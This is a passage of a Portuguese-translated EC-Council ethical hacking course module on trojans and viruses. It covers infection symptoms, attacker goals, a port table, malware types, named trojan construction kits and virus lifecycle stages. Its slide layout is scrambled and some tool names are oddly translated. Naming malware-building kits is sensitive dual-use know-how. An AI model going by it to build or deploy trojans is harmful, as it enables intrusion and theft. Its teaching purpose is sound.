ÿ O teclado e o mouse congelam.
ÿ Os contatos recebem e-mails do endereço de e-mail de um usuário que o usuário não enviou.
ÿ Aparecem avisos estranhos ou caixas de perguntas. Muitas vezes, são mensagens pessoais dirigidas ao usuário,
fazendo perguntas que exigem que ele responda clicando em um botão Sim, Não ou OK.
ÿ O sistema desliga e reinicia de maneiras incomuns.
ÿ A barra de tarefas desaparece automaticamente.
ÿ O Gerenciador de Tarefas está desabilitado. O invasor ou cavalo de Tróia pode desativar a função Gerenciador de
Tarefas para que a vítima não possa visualizar a lista de tarefas ou encerrar a tarefa em um determinado programa
ou processo.

Como os hackers usam cavalos de Tróia
Excluir ou substituir arquivos Desative firewalls e

críticos do sistema operacional antivírus
Grave capturas de tela, áudio e Crie backdoors para obter

vídeo do PC da vítima acesso remoto
Roubar informações pessoais, como

Use o PC da vítima para enviar spam
senhas, códigos de segurança e
e enviar mensagens de e-mail
informações de cartão de crédito
Baixe spyware, adware e arquivos Criptografe os dados e impeça a vítima

maliciosos de acessar a máquina
Como os hackers usam cavalos de Tróia
Os invasores criam programas maliciosos, como cavalos de Tróia, para os seguintes fins:
ÿ Excluir ou substituir os arquivos críticos do sistema operacional
ÿ Gerar tráfego falso para realizar ataques DoS
ÿ Grave capturas de tela, áudio e vídeo do PC da vítima
ÿ Use o PC da vítima para enviar spam e enviar mensagens de e-mail
ÿ Baixar spyware, adware e arquivos maliciosos
ÿ Desativar firewalls e antivírus
ÿ Crie backdoors para obter acesso remoto
ÿ Infectar o PC da vítima como um servidor proxy para retransmitir ataques
ÿ Usar o PC da vítima como um botnet para realizar ataques DDoS
ÿ Roubar informações confidenciais, como:
o Informações de cartão de crédito, que são úteis para registro de domínio, bem como para compras usando
keyloggers
o Dados da conta, como senhas de e-mail, senhas dial-up e serviço da web

senhas
o Projetos importantes da empresa, incluindo apresentações e documentos relacionados ao trabalho
ÿ Criptografar a máquina da vítima e impedir que a vítima acesse a máquina

ÿ Use o sistema de destino da seguinte forma:
o Para armazenar arquivos de materiais ilegais, como pornografia infantil. O alvo continua usando seu sistema
sem perceber que os invasores o estão usando para atividades ilegais
o Como um servidor FTP para software pirata
ÿ Script kiddies podem apenas querer se divertir com o sistema de destino; um invasor pode implantar um cavalo de
Tróia no sistema apenas para fazer com que o sistema aja de maneira estranha (por exemplo, a bandeja do
CD\DVD abre e fecha com frequência, o mouse funciona incorretamente, etc.)
ÿ O invasor pode usar um sistema comprometido para outros fins ilegais, de modo que o alvo seja responsabilizado
se essas atividades ilegais forem descobertas pelas autoridades

Portas comuns usadas por Trojans

Porta troiano Porta troiano Porta troiano
20/22/80/443 O emote 1807 SpySender 8080 Zeus, Shamoon
21 Blade Runner, DarkFTP 1863 XtremeRAT 8787 / 54321 BackOfrice 2000
22 SSH RAT, Coelho Linux 2140/3150/6670-71 Garganta Profunda 10048 Escavação
23 EliteWrap 5000 SpyGate RAT, Punisher RAT 10100 Presente
68 mspy 5400-02 Blade Runner 11000 Senna Spy
80 Ismdoor, Poison Ivy, POWERSTATS 6666 KilerRat, Houdini RAT 11223 Trojan progênico
443 Cardinal RAT, gh0st RAT, TrickBot 6667/12349 Bionet, Cão Mágico 12223 Hack´99 KeyLogger
445 WannaCry, Petya 6969 Gate Crasher, Prioridade 23456 FTP Maligno, FTP Feio
Orifício Traseiro/ Orifício Traseiro 1.20/

1177 njRAT 7000 Captura Remota 31337-38
BO Profundo
1604 DarkComet RAT, Pandora RAT 7789 ICKiller 65000 Diabo
Portas comuns usadas por Trojans
As portas representam os pontos de entrada e saída do tráfego de dados. Existem dois tipos de portas: portas de hardware
e portas de software. As portas dentro do sistema operacional são portas de software e geralmente são pontos de entrada
e saída para o tráfego de aplicativos (por exemplo, a porta 25 está associada ao SMTP para roteamento de e-mail entre
servidores de e-mail). Muitas portas existentes são específicas do aplicativo ou específicas do processo. Vários cavalos de
Tróia usam algumas dessas portas para infectar os sistemas de destino.
Os usuários precisam de uma compreensão básica do estado de uma "conexão ativa" e das portas comumente usadas
por cavalos de Tróia para determinar se um sistema foi comprometido.
Entre os vários estados, o estado de “escuta” é o mais importante neste contexto. O sistema gera esse estado quando
escuta um número de porta enquanto espera para se conectar a outro sistema. Sempre que um sistema é reinicializado,
os cavalos de Tróia passam para o estado de escuta; alguns usam mais de uma porta: uma para "escutar" e outra(s) para
transferência de dados. As portas comuns usadas por diferentes cavalos de Tróia estão listadas na tabela abaixo.
Porta troiano Porta troiano
2 Morte Soquetes de Tróia 5001/50505
20/22/80/443
A emoção 5321 FireHotcker
21/3024/ Blade Runner/Blade Runner

WinCrashName 5400-02
4092/5742 0.80 Alfa
Blade Runner, Doly Trojan, Fore,

21 5569 Robo-Hack
FTP invisível, WebEx, WinCrash, DarkFTP

22 Eixo, SSH RAT, Coelho Linux 6267 GW Girl
23 Servidor Telnet minúsculo, EliteWrap 6400 Coisa
Antigen, Email Password Sender,

Terminator, WinPC, WinSpy, Haebu Coceda, Shtrilitz
25 Stealth, Terminator, Kuang2 0.17A 0.30, Jesrto, Lazarus 6666 KilerRat, Houdini RAT
Group, Mis-Type, Night Dragon
26 BadPatch 6667/12349 Bionet, Cão Mágico
31/456 Paraíso dos Hackers 6670-71 Garganta Profunda
Denis, Ebury, FIN7, Lazarus Group,

53 Folhas Vermelhas, Grupo de Ameaças-3390, Trópico 6969 Gate Crasher, Prioridade
Soldado
68 mspy 7000 Captura Remota
Necurs, NetWire, Ismdoor, Poison Ivy,

Executor, Codered, APT 18, APT 19, APT 32,
BBSRAT, Calisto, Carbanak, Carbon, Comnie,
Empire, FIN7, InvisiMole, Lazarus Group,
80 7300-08 NetMonitorName
MirageFox, Mis-Type, Misdat, Mivast,
MoonWind, Dragão da Noite, POWERSTATS,
RedLeaves, S-Type, Threat Group-3390,
UBoatRAT
7300/31338/
113 Arrepio Net Spy
31339
139 Nuker, Libélula 2.0 7597 Gás
421 Tróia TCP Wrappers 7626 Gdoor
ADVSTORESHELL , APT 29, APT 3, APT 33,

AuditCred, BADCALL, BBSRAT, Bisonal, Briba,
Carbanak, Cardinal RAT, Comnie, Derusbi, ELMER,
,
Empire, FELIXROOT, FIN7, FIN8 gh0st RAT, HARDRAIN,
Hi-Zor, HOPLIGHT, KEYMARBLE, Lazarus Group,
443 LOWBALL, Mis Type, Misdat , MoonWind, Naid, Nidiran, 7777 Mensagem de Deus
Pasam, PlugX, PowerDuke, POWERTON, Proxysvc,

RATANKBA, RedLeaves, S-Type, TEMP.Veles Threat
Group-3390, TrickBot, Tropic Trooper, TYPEFRAME,
UBoatRAT ,
445 WannaCry, Petya, Libélula 2.0 7789 ICKiller
456 Paraíso dos Hackers 8000 BADCALL, Comnie, Volgmer
Módulo 03 Página 122 Ethical Hacking Essentials Copyright © por EC-Council

Todos os direitos reservados. A reprodução é estritamente proibida.

555 Ini-Killer, Fase Zero, Espião Furtivo 8012 Ptakks
Zeus, APT 37, Comnie,

EvilGrab, FELIXROOT, FIN7,
Navegador HTTP, Lazarus
666 Satanz Backdoor, Estripador 8080 Grupo, Cão Mágico,
OceanSalt, tipo S,
Shamoon, TYPEFRAME,
folgmer
FELIXROOT, entrou,
1001 Silenciador, WebEx 8443
TIPOFRAME
1011 Um cavalo de Tróia completo 8787/54321 BackOffice 2000
1026/
RSM 9989 iNi-Killer
64666
1095-98 RATO 10048 Escavação
1170 Servidor Psyber Stream, Voz 10100 Presente
1177 njRAT 10607 Coma 1.0.9
1234 Cavalo de Tróia Ultor 11000 Senna Spy
1234/
linha de válvula 11223 Trojan progênico
12345
1243 SubSeven 1.0 – 1.8 12223 Hack´99 KeyLogger
1243/6711/
Sub Sete 12345-46 GabanBus, NetBus
6776/27374
1245 Boneca VooDoo 12361, 12362 Whack-a-mole
1777 Java RAT, Agent.BTZ/ComRat, Adwind RAT 16969 Prioridade
1349 DLL de back-office 20001 Milênio
NetBus 2.0, Beta

1492 FTP99CMP 20034/1120
NetBus 2.01
1433 delito 21544 Namorada 1.0, Beta-1.35
22222/
1600 Shivka Burka Prosiak
33333
1604 DarkComet RAT, Pandora RAT, HellSpy RAT 22222 Zinco
1807 SpySender 23432

Asilo


1863 XtremeRAT 23456 FTP Maligno, FTP Feio
1981 rave de choque 25685 Torta da Lua
1999 BackDoor 1.00-1.03 26274 Delta
2001 vaca de Tróia 30100-02 NetSphere 1.27a
Orifício Traseiro/ Orifício Traseiro

2115 Insetos 31337-38
1.20 /BO Profundo
2140 o invasor 31338 DeepBO
2140/3150 Garganta Profunda 31339 NetSpy DK
2155 Illusion Mailer, Nirvana 31666 BOWhack
2801 Phineas Phucker 34324 Big Gluck, TN
3129 Masters Paradise 40412 O espião
3131 Subsari 40421-26 Masters Paradise
3150 o invasor 47262 Delta
3389 RDP 50766 dianteiro
3700/9872-
Janelas remotas
portal da perdição 53001
Desligar
9875/10067/10167
4000 DA 54321 Ônibus escolar .69-1.11 /
4567 Lima Prego 1 61466 Telecommando
4590 ICQTrojan 65000 Diabo
5000 Bubbel, SpyGate RAT, Punisher RAT
Tabela 3.1: Trojans e porta de ataque correspondente

Tipos de cavalos de Tróia
ÿ Trojans são categorias de acordo com seu funcionamento e alvos
Alguns dos exemplos incluem:
1 Trojans de acesso remoto 8 cavalos de Tróia de protocolo de serviço
2 cavalos de Tróia de backdoor 9 cavalos de Tróia móveis
3 trojans de redes de bots 10 cavalos de Tróia IoT
4 Trojans rootkits 11 Trojans de desabilitação de software de segurança
5 cavalos de Tróia de banco eletrônico 12 cavalos de Tróia destrutivos
6 Trojans de ponto de venda 13 Trojans de ataque DDoS
7 cavalos de Tróia de desfiguração 14 Cavalos de Tróia do Shell de Comando
Tipos de cavalos de Tróia
O Trojan é classificado em várias categorias, dependendo dos alvos da funcionalidade de exploração. Alguns tipos de
Trojan estão listados abaixo:
1. Cavalos de Tróia de acesso remoto: Os cavalos de Tróia de acesso remoto (RATs) fornecem aos invasores
controle total sobre o sistema da vítima, permitindo que eles acessem remotamente arquivos, conversas privadas,
dados contábeis, etc. O RAT atua como um servidor e escuta em uma porta que não deve estar disponível para
invasores da Internet.
2. Backdoor Trojans: Um backdoor é um programa que pode ignorar a autenticação padrão do sistema ou os
mecanismos convencionais do sistema, como IDS e firewalls, sem ser detectado. Nesses tipos de violação, os
hackers usam programas de backdoor para acessar o computador ou a rede da vítima. A diferença entre esse
tipo de malware e outros tipos de malware é que a instalação do backdoor é realizada sem o conhecimento do
usuário. Isso permite que o invasor execute qualquer atividade no computador infectado, como transferência,
modificação ou corrupção de arquivos, instalação de software malicioso e reinicialização da máquina, sem
detecção do usuário.
3. Botnet Trojans: Atualmente, a maioria dos principais ataques à segurança da informação envolve botnets.
Os invasores (também conhecidos como “bot herders”) usam botnet Trojans para infectar um grande número de
computadores em uma grande área geográfica para criar uma rede de bots (ou um “bot rebanho”) que pode obter
o controle por meio de um comando e controle (C&C) centro. Eles enganam os usuários comuns de computador
para que baixem arquivos infectados por Trojan em seus sistemas por meio de phishing, hacking de SEO,
redirecionamento de URL etc. mais instruções.

4. Trojans rootkit: como o nome indica, “rootkit” consiste em dois termos, ou seja, “root” e “kit”. “Root” é um termo
UNIX/Linux equivalente a “administrador” no Windows.
A palavra “kit” denota programas que permitem que alguém obtenha acesso de nível root/admin ao computador
executando os programas no kit. Os rootkits são backdoors potentes que atacam especificamente a raiz ou o
sistema operacional. Ao contrário dos backdoors, os rootkits não podem ser detectados pela observação de
serviços, listas de tarefas do sistema ou registros. Os rootkits fornecem controle total do sistema operacional da
vítima para o invasor.
5. E-Banking Trojans: Os Trojans de e-banking são extremamente perigosos e surgiram como uma ameaça
significativa para o banco online. Eles interceptam as informações da conta da vítima antes que o sistema possa
criptografá-las e enviá-las ao centro de comando e controle do invasor. A instalação desses cavalos de Tróia
ocorre no computador da vítima quando ela clica em um anexo de e-mail malicioso ou em um anúncio malicioso.
Os invasores programam esses cavalos de Tróia para roubar quantias monetárias mínimas e máximas, para
que não retirem todo o dinheiro da conta, evitando assim suspeitas.
6. Trojans de ponto de venda: como o nome indica, os cavalos de Troia de ponto de venda (POS) são um tipo de
malware financeiro fraudulento que tem como alvo equipamentos de PDV e pagamento, como leitores de cartão
de crédito/débito. Os invasores usam Trojans de POS para comprometer esses equipamentos de POS e obter
informações confidenciais sobre cartões de crédito, como número do cartão de crédito, nome do titular e número
CVV.
7. Trojans de desfiguração: Os Trojans de desfiguração, uma vez espalhados pelo sistema, podem destruir ou
alterar todo o conteúdo de um banco de dados. No entanto, eles são mais perigosos quando os invasores têm
como alvo sites, pois alteram fisicamente o formato HTML subjacente, resultando na modificação do conteúdo.
Além disso, podem ocorrer perdas significativas devido à desfiguração de alvos de e-business por Trojans.
8. Cavalos de Tróia de protocolo de serviço: esses cavalos de Tróia podem aproveitar protocolos de serviço
vulneráveis, como VNC, HTTP/HTTPS e ICMP, para atacar a máquina da vítima.
9. Trojans móveis : Trojans móveis são softwares mal-intencionados direcionados a telefones celulares.
Os ataques de Trojan móveis estão aumentando rapidamente devido à proliferação global de telefones
celulares. O invasor engana a vítima para que instale o aplicativo malicioso. Quando a vítima baixa o aplicativo
malicioso, o Trojan realiza vários ataques, como roubo de credenciais bancárias, roubo de credenciais de redes
sociais, criptografia de dados e bloqueio de dispositivos.
10. Trojans IoT: Internet das coisas (IoT) refere-se à inter-rede de dispositivos físicos, edifícios e outros itens
incorporados com eletrônicos. Trojans IoT são programas maliciosos que atacam redes IoT. Esses cavalos de
Tróia utilizam uma botnet para atacar outras máquinas fora da rede IoT.
11. Cavalos de Tróia de desabilitação de software de segurança : Os trojans de desabilitação de software de

segurança interrompem o funcionamento de programas de segurança, como firewalls e IDS, desativando-os ou
eliminando os processos. Esses são cavalos de Tróia de entrada, que permitem que um invasor execute o
próximo nível de ataque no sistema de destino.

12. Trojans destrutivos: O único objetivo de um Trojan destrutivo é excluir arquivos em um sistema de destino.
O software antivírus pode não detectar cavalos de Tróia destrutivos. Depois que um Trojan destrutivo infecta
um sistema de computador, ele exclui aleatoriamente arquivos, pastas e entradas de registro, bem como
unidades locais e de rede, geralmente resultando em falha do sistema operacional.
13. Cavalos de Tróia de ataque DDoS: esses cavalos de Tróia destinam-se a realizar ataques DDoS em
máquinas, redes ou endereços da Web de destino. Eles transformam a vítima em um zumbi que escuta
comandos enviados de um servidor DDoS na Internet. Haverá vários sistemas infectados aguardando um
comando do servidor e, quando o servidor enviar o comando a todos ou a um grupo de sistemas infectados,
uma vez que todos os sistemas executam o comando simultaneamente, uma quantidade considerável de
solicitações legítimas inunda o alvo e fazer com que o serviço pare de responder.
14. Cavalos de Troia Command Shell: um Trojan shell de comando fornece controle remoto de um shell de
comando na máquina da vítima. Um servidor Trojan é instalado na máquina da vítima, que abre uma porta,
permitindo que o invasor se conecte. O cliente é instalado na máquina do invasor, que é usado para iniciar
um shell de comando na máquina da vítima. Netcat, DNS Messenger, GCat são alguns dos mais recentes
Trojans de shell de comando.

Criando um cavalo de Tróia
Os kits de construção de Cavalos de Tróia ajudam os invasores a construir cavalos de Tróia de sua escolha
As ferramentas nesses kits podem ser perigosas e podem sair pela culatra se não forem executadas corretamente
Cavalo de Tróia Cavalo de Tróia Theef RAT

Kits de construção
Theef é um Trojan de
ÿ Criador de vírus Trojan DarkHorse acesso remoto escrito
em Delphi. Ele permite
ÿ Kit de Construção de Cavalo de Tróia
que atacantes remotos
acessem o sistema via
ÿ Gerador de Trojan Senna Spy
porta 9871
ÿ Gerador de Trojan em Lote
ÿ Umbra Loader - Trojan Botnet

criador
Criando um cavalo de Tróia
Os invasores podem criar cavalos de Tróia usando vários kits de construção de cavalos de Tróia, como DarkHorse Trojan Virus
Maker e Senna Spy Trojan Generator.
Kit de Construção de Cavalo de Tróia
Os kits de construção de cavalos de Tróia ajudam os invasores a construir cavalos de Tróia e personalizá-los de acordo com suas
necessidades. Essas ferramentas são perigosas e podem sair pela culatra se não forem executadas corretamente.
Novos cavalos de Tróia criados por invasores não são detectados quando verificados por ferramentas de verificação de vírus ou
cavalos de Tróia, pois não correspondem a nenhuma assinatura conhecida. Esse benefício adicional permite que os invasores
tenham sucesso no lançamento de ataques.
ÿ Cavalo de Tróia Theef RAT
Theef é um Trojan de acesso remoto escrito em Delphi. Ele permite que atacantes remotos acessem o sistema através da
porta 9871. Theef é um aplicativo baseado em Windows para cliente e servidor. O servidor Theef é um vírus que você
instala em um computador de destino, e o cliente Theef é o que você usa para controlar o vírus.

Figura 3.3: captura de tela do Trojan Theef RAT
Alguns kits adicionais de construção de cavalos de Tróia são os seguintes:
ÿ Criador de vírus Trojan DarkHorse
ÿ Kit de Construção de Cavalo de Tróia
ÿ Gerador de Trojan Senna Spy
ÿ Gerador de Trojan em Lote
ÿ Umbra Loader - Criador de Trojan de Botnet

O que é um vírus?
ÿ Um vírus é um programa autorreplicante que produz sua

própria cópia anexando-se a outro programa, setor de
inicialização do computador ou documento
ÿ Os vírus geralmente são transmitidos por meio de

downloads de arquivos, unidades de disco/flash
infectadas e como anexos de e-mail
ÿ Infectar outros programas
ÿ Transformar-se
Características ÿ Criptografar-se
de vírus ÿ Alterar dados
ÿ Arquivos e programas corrompidos
ÿ Auto-replicação
vírus
O que é um vírus?
Os vírus são o flagelo da computação moderna. Os vírus de computador têm o potencial de causar estragos em
computadores comerciais e pessoais. A vida útil de um vírus depende de sua capacidade de se reproduzir. Portanto,
os invasores projetam cada código de vírus de forma que o vírus se replique n vezes.
Um vírus de computador é um programa autorreplicante que produz seu código anexando cópias de si mesmo a
outro código executável e opera sem o conhecimento ou consentimento do usuário. Como um vírus biológico, um
vírus de computador é contagioso e pode contaminar outros arquivos; no entanto, os vírus podem infectar máquinas
externas apenas com a ajuda de usuários de computador.
O vírus reproduz seu próprio código enquanto inclui outros executáveis e se espalha pelo computador. Os vírus
podem espalhar a infecção danificando arquivos em um sistema de arquivos. Alguns vírus residem na memória e
podem infectar programas por meio do setor de inicialização. Um vírus também pode estar em uma forma
criptografada.
Alguns vírus afetam os computadores assim que seu código é executado; outros vírus permanecem inativos até que
uma circunstância lógica pré-determinada seja atendida. Os vírus infectam uma variedade de arquivos, como
arquivos de sobreposição (.OVL) e arquivos executáveis (.EXE, .SYS, .COM ou .BAT). Eles são transmitidos por
meio de downloads de arquivos, unidades de disco/flash infectadas e anexos de e-mail.
Um vírus só pode se espalhar de um PC para outro quando seu programa host é transmitido para o computador não
corrompido. Isso pode ocorrer, por exemplo, quando um usuário o transmite por uma rede ou o executa em uma
mídia removível. Às vezes, os vírus são confundidos com worms, que são programas autônomos que podem se
espalhar para outros computadores sem um host. A maioria dos PCs agora está conectada à Internet e a redes
locais, o que ajuda a aumentar sua disseminação.

Características dos vírus
O desempenho de um computador é afetado por uma infecção por vírus. Esta infecção pode levar à perda de dados,
falha do sistema e corrupção de arquivos.
Algumas das características de um vírus são as seguintes:
ÿ Infecta outros programas
ÿ Transforma-se
ÿ Criptografa a si mesmo
ÿ Altera dados
ÿ Corrompe arquivos e programas
ÿ Replica-se

Finalidade da Criação de Vírus
Infligir danos aos Envolver-se em
concorrentes terrorismo cibernético
Realize financeiro Distribuir política

benefícios mensagens
Vandalizar Danificar redes ou

propriedade intelectual computadores
Brincar/Fazer pesquisas Obter acesso remoto ao

computador da vítima
Finalidade da Criação de Vírus
Os invasores criam vírus com motivos duvidosos. Os criminosos criam vírus para destruir os dados de uma empresa,
como um ato de vandalismo ou para destruir os produtos de uma empresa; no entanto, em alguns casos, os vírus
auxiliam o sistema.
Um invasor cria um vírus para os seguintes fins:

ÿ
Infligir danos aos concorrentes
ÿ Perceber benefícios financeiros
ÿ Vandalizar propriedade intelectual
ÿ Fazer brincadeiras
ÿ Realizar pesquisas
ÿ Envolver-se em Ciberterrorismo
ÿ Distribuir mensagens políticas
ÿ Danificar redes ou computadores
ÿ Obter acesso remoto ao computador da vítima

Indicações de ataque de vírus
Os processos exigem O computador congela com

mais recursos e tempo, 01 05 frequência ou encontra um erro como
resultando em desempenho degradado BSOD
Computador apita sem exibição 02 06 Arquivos e pastas estão faltando
Alterações no rótulo do drive e o sistema

operacional não carrega 03 07 Atividade suspeita no disco rígido
Alertas antivírus constantes 04 08 A janela do navegador “congela”
Indicações de ataque de vírus
Indicações de ataques de vírus surgem de atividades anormais. Tais atividades refletem a natureza de um
vírus interrompendo o fluxo regular de um processo ou programa. No entanto, nem todos os bugs criados contribuem para
atacar o sistema; eles podem ser apenas falsos positivos. Por exemplo, se o sistema estiver mais lento do que o normal,
pode-se presumir que um vírus infectou o sistema; no entanto, o motivo real pode ser a sobrecarga do programa.
Um vírus eficaz tende a se multiplicar rapidamente e pode infectar algumas máquinas em um curto período.
Os vírus podem infectar arquivos no sistema e, quando esses arquivos são transferidos, podem infectar máquinas de outros
usuários que os recebem. Um vírus também pode usar servidores de arquivos para infectar arquivos.
Quando um vírus infecta um computador, a vítima ou usuário poderá identificar alguns indícios da presença de infecção por
vírus.
Algumas indicações de infecção por vírus de computador são as seguintes:
ÿ Processos exigem mais recursos e tempo, ÿ Faltam arquivos e pastas

resultando em desempenho degradado
ÿ Atividade suspeita no disco rígido
ÿ A janela do navegador “congela”

ÿ Computador emite um bipe sem exibição
ÿ Falta de espaço de arrumação
ÿ Mudanças de rótulo de unidade e sistema operacional não
carga ÿ Anúncios indesejados e janelas pop-up
ÿ Alertas antivírus constantes

ÿ Incapaz de abrir arquivos no sistema
ÿ O computador congela frequentemente ou
encontra um erro como BSOD ÿ E-mails estranhos recebidos

Etapas do ciclo de vida do vírus
O vírus se replica por um Os usuários instalam
período dentro do sistema de Um vírus é identificado como atualizações de antivírus e

destino e depois se espalha uma ameaça que infecta o eliminam as ameaças de vírus
sistema de destino
Execução da rotina de
Replicação Detecção danos
Projeto Lançar Incorporação
Desenvolvimento de código de vírus Ele é ativado quando o usuário Os desenvolvedores de
usando linguagens de programação executa determinadas ações, software antivírus assimilam

ou kits de construção como executar programas as defesas contra o vírus
infectados
Etapas do ciclo de vida do vírus
O ciclo de vida do vírus inclui os seis estágios a seguir, desde a origem até a eliminação.
1. Design: Desenvolvimento de código de vírus usando linguagens de programação ou kits de construção.
2. Replicação: o vírus se replica por um período dentro do sistema de destino e depois se espalha
em si.
3. Iniciar: o vírus é ativado quando o usuário executa ações específicas, como executar
um programa infectado.
4. Detecção: O vírus é identificado como uma ameaça que infecta o sistema de destino.
5. Incorporação: Os desenvolvedores de software antivírus assimilam as defesas contra o vírus.
6. Execução da rotina de danos: Usuários instalam atualizações de antivírus e eliminam o vírus

ameaças.

Como um computador é infectado por vírus?
Quando um usuário aceita Não está executando o

arquivos e downloads sem
aplicativo antivírus mais recente
verificar corretamente a fonte
Abrindo anexos de e-mail Clicar em anúncios

infectados on-line maliciosos
Instalando software
Usando mídia portátil
pirata
Não atualizar e não

Conectando-se a
instalar novas versões
redes não confiáveis
de plug-ins
Como um computador é infectado por vírus?
Para infectar um sistema, primeiro, um vírus precisa entrar nele. Depois que o usuário baixa e instala o vírus de
qualquer fonte e de qualquer forma, ele se replica para outros programas. Então, o vírus pode infectar o
computador de várias formas, algumas das quais estão listadas abaixo:
ÿ Downloads: Os invasores incorporam vírus em programas de software populares e os carregam em sites

destinados a download. Quando um usuário inadvertidamente baixa esse software infectado e o instala,
o sistema é infectado.
ÿ Anexos de e-mail: Os invasores geralmente enviam arquivos infectados por vírus como anexos de e-mail
para espalhar o vírus no sistema da vítima. Quando a vítima abre o anexo malicioso, o vírus infecta
automaticamente o sistema.
ÿ Software pirata: A instalação de versões crackeadas de software (SO, Adobe, Microsoft Office, etc.) pode
infectar o sistema, pois podem conter vírus.
ÿ Falha ao instalar software de segurança: Com o aumento dos parâmetros de segurança, os invasores
estão projetando novos vírus. Deixar de instalar o software antivírus mais recente ou de atualizá-lo
regularmente pode expor o sistema do computador a ataques de vírus.
ÿ Atualização de software: Se os patches não forem instalados regularmente quando lançados pelos
fornecedores, os vírus podem explorar as vulnerabilidades, permitindo assim que um invasor acesse o sistema.
ÿ Navegador: Por padrão, todo navegador vem com segurança integrada. Um navegador configurado
incorretamente pode resultar na execução automática de scripts, o que pode, por sua vez, permitir a
entrada de vírus no sistema.
ÿ Firewall: Desativar o firewall comprometerá a segurança do tráfego de rede e convidará os vírus a infectar
o sistema.

ÿ Pop-ups: Quando o usuário clica em qualquer pop-up suspeito por engano, o vírus oculto atrás do pop-up entra no
sistema. Sempre que o usuário ligar o sistema, o código do vírus instalado será executado em segundo plano.
ÿ Mídia removível: quando um sistema saudável está associado a uma mídia removível infectada por vírus (por exemplo,
CD/DVD, unidade USB, leitor de cartão), o vírus se espalha pelo sistema.
ÿ Acesso à rede: conectar-se a uma rede Wi-Fi não confiável, deixar o Bluetooth LIGADO ou permitir que um programa
de compartilhamento de arquivos seja acessado abertamente permitirá que um vírus assuma o controle do dispositivo.
ÿ Backup e restauração: Fazer backup de um arquivo infectado e restaurá-lo em um sistema

infecta o sistema novamente com o mesmo vírus.
ÿ Anúncios on-line maliciosos: os invasores publicam anúncios on-line maliciosos incorporando código malicioso nos
anúncios, também conhecido como malvertising. Depois que os usuários clicam nesses anúncios, seus computadores
são infectados.
ÿ Mídia Social: As pessoas tendem a clicar em sites de mídia social, incluindo links maliciosos compartilhados
por seus contatos, que podem infectar seus sistemas.

Tipos de vírus
ÿ Os vírus são classificados de acordo com seu funcionamento e alvos
ÿ Alguns dos exemplos incluem:
Vírus do sistema ou do setor de inicialização Vírus polimórfico Vírus de script da Web
Arquivo e vírus multipartido Vírus metamórfico E-mail e vírus blindado
Sobrescrevendo Arquivo ou Cavidade

Vírus de Macro e Cluster Complemento e vírus intrusivo
Vírus
Companheiro/Camuflagem Ação Direta ou Transitória

Vírus furtivo/túnel
Vírus Vírus
Shell e extensão de arquivo Rescindir e Permanecer Residente

vírus de criptografia
Vírus Vírus
Vírus Infector Esparso Vírus FAT e Logic Bomb
Tipos de vírus
Os vírus são classificados de acordo com seu funcionamento e alvos. Alguns dos tipos mais comuns de vírus de
computador que afetam negativamente a segurança dos sistemas estão listados abaixo:
1. Vírus do sistema ou do setor de inicialização: os alvos mais comuns para um vírus são os setores do
sistema, que incluem o registro mestre de inicialização (MBR) e os setores do sistema de registro de
inicialização do DOS. Os principais portadores de vírus do sistema ou do setor de inicialização são
anexos de e-mail e mídia removível (unidades USB). Um vírus do setor de inicialização move o MBR
para outro local no disco rígido e se copia para o local original do MBR. Quando o sistema inicializa,
primeiro, o código do vírus é executado e, em seguida, o controle passa para o MBR original.
2. Vírus de arquivo: Os vírus de arquivo infectam arquivos executados ou interpretados no sistema, como
arquivos COM, EXE, SYS, OVL, OBJ, PRG, MNU e BAT. Os vírus de arquivo podem ser vírus de ação
direta (não residentes) ou residentes na memória. Os vírus de arquivo inserem seu código no arquivo
original e infectam os arquivos executáveis. Esses vírus são numerosos, embora raros. Eles infectam
de várias maneiras e são encontrados em vários tipos de arquivos.
3. Vírus multipartido: um vírus multipartido (também conhecido como vírus multiparte ou vírus híbrido)
combina a abordagem de infectadores de arquivo e de registro de inicialização e tenta atacar
simultaneamente o setor de inicialização e os arquivos executáveis ou de programa. Quando o vírus
infecta o setor de inicialização, ele, por sua vez, afeta os arquivos do sistema e vice-versa.
Esse tipo de vírus infecta novamente um sistema repetidamente se não for totalmente removido da
máquina de destino. Alguns exemplos de vírus multipartidos incluem Invader, Flip e Tequila.
4. Vírus de macro: Os vírus de macro infectam o Microsoft Word ou aplicativos semelhantes executando
automaticamente uma sequência de ações após acionar um aplicativo. Maioria

os vírus de macro são escritos usando a linguagem de macro Visual Basic for Applications (VBA) e infectam modelos
ou convertem documentos infectados em arquivos de modelo, mantendo a aparência de arquivos de documentos
comuns.
5. Vírus de cluster: vírus de cluster infectam arquivos sem alterar o arquivo ou plantar arquivos adicionais. Eles salvam o
código do vírus no disco rígido e sobrescrevem o ponteiro na entrada do diretório, direcionando o ponto de leitura do
disco para o código do vírus em vez do programa real. Mesmo que as alterações na entrada do diretório possam
afetar todos os programas, apenas uma cópia do vírus existe no disco.
6. Vírus Stealth/Tunneling: Esses vírus tentam se esconder dos programas antivírus alterando e corrompendo ativamente
as interrupções da chamada de serviço durante a execução. O código do vírus substitui as solicitações para executar
operações relacionadas a essas interrupções de chamada de serviço. Esses vírus fornecem informações falsas para
ocultar sua presença de programas antivírus. Por exemplo, um vírus furtivo oculta as operações que modificou e dá
representações falsas. Assim, ele assume o controle de partes do sistema de destino e oculta seu código de vírus.
7. Vírus de criptografia: vírus de criptografia ou vírus cryptolocker penetram no sistema de destino por meio de freeware,
shareware, codecs, anúncios falsos, torrentes, spam de e-mail e assim por diante.
Esse tipo de vírus consiste em uma cópia criptografada do vírus e um módulo de descriptografia.
O módulo de descriptografia permanece constante, enquanto a criptografia faz uso de chaves diferentes.
8. Vírus Infector Esparso: Para espalhar a infecção, os vírus geralmente tentam se esconder dos programas antivírus.
Vírus infectantes esparsos infectam com menos frequência e tentam minimizar sua probabilidade de descoberta.
Esses vírus infectam apenas ocasionalmente ao satisfazer certas condições ou infectam apenas os arquivos cujos
tamanhos estão dentro de um intervalo estreito.
9. Vírus Polimórficos: Esses vírus infectam um arquivo com uma cópia criptografada de um código polimórfico já
decodificado por um módulo de descriptografia. Os vírus polimórficos modificam seu código para cada replicação para
evitar a detecção. Eles conseguem isso alterando o módulo de criptografia e a sequência de instruções. Mecanismos
polimórficos usam geradores de números aleatórios em sua implementação.
10. Vírus Metamórficos: Os vírus metamórficos são programados de forma que se reescrevem completamente cada vez
que infectam um novo arquivo executável. Esses vírus são sofisticados e usam mecanismos metamórficos para sua
execução. O código metamórfico se reprograma. Ele é traduzido em código temporário (uma nova variante do mesmo
vírus, mas com código diferente) e depois convertido de volta no código original. Essa técnica, na qual o algoritmo
